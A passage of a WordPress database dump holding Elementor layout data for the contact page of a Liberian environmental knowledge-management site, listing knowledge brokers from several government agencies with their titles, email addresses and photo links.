\\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23500,3419,'_elementor_edit_mode','builder'),(23501,3419,'_elementor_template_type','wp-page'),(23502,3419,'_elementor_version','3.0.16'),(23503,3419,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (23504,3419,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager-CCCD Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br 